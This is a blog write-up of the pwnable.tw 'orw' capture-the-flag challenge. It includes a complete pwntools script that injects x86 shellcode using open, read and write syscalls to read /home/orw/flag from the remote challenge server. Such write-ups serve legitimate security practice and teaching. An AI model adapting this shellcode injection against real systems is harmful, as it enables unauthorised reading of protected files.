Challenge


Solving

running binary :

and part of main disassembly :

Binary reads our payload and store it at the address 0x8048370, then it runs the code there.

As the problem description says, maybe we should make a shellcode only with open, read, write syscall.

Here is my python script

#!/usr/bin/env python
# pwnable.tw orw

from pwn import *

debug = 0

def exploit():
	shellcode = ''
	shellcode += asm('mov eax, 0x5')		# syscall : open
	shellcode += asm('mov ebx, 0x804a09c')	# filename
	shellcode += asm('mov ecx, 0x0')		# flags
	shellcode += asm('mov edx, 0x804a0ab')	# mode
	shellcode += asm('int 0x80')
	shellcode += asm('mov ebx, eax')		# fd
	shellcode += asm('mov eax, 0x3')		# syscall : read
	shellcode += asm('mov ecx, 0x804a100')	# buf
	shellcode += asm('mov edx, 0x64')		# count
	shellcode += asm('int 0x80')
	shellcode += asm('mov edx, eax')		# count
	shellcode += asm('mov eax, 0x4')		# syscall : write
	shellcode += asm('mov ebx, 0x1')		# fd
	shellcode += asm('mov ecx, 0x804a100')	# buf
	shellcode += asm('int 0x80')
	shellcode += '/home/orw/flag\x00'
	shellcode += 'r\x00'
	s.send(shellcode)

if __name__ == '__main__':
	if debug:
		s = process('./orw')
		pause()
	else:
		s = remote('chall.pwnable.tw', 10001)

	exploit()
	s.interactive()
	s.close()


FL4G

'pwnable.tw' 카테고리의 다른 글

[pwnable.tw] Silver Bullet writeup  (0) 2018.10.11
[pwnable.tw] hacknote writeup  (0) 2018.10.11
[pwnable.tw] dubblesort writeup  (0) 2018.10.11
[pwnable.tw] calc writeup  (0) 2018.10.11
[pwnable.tw] start writeup  (0) 2018.09.29

+ Recent posts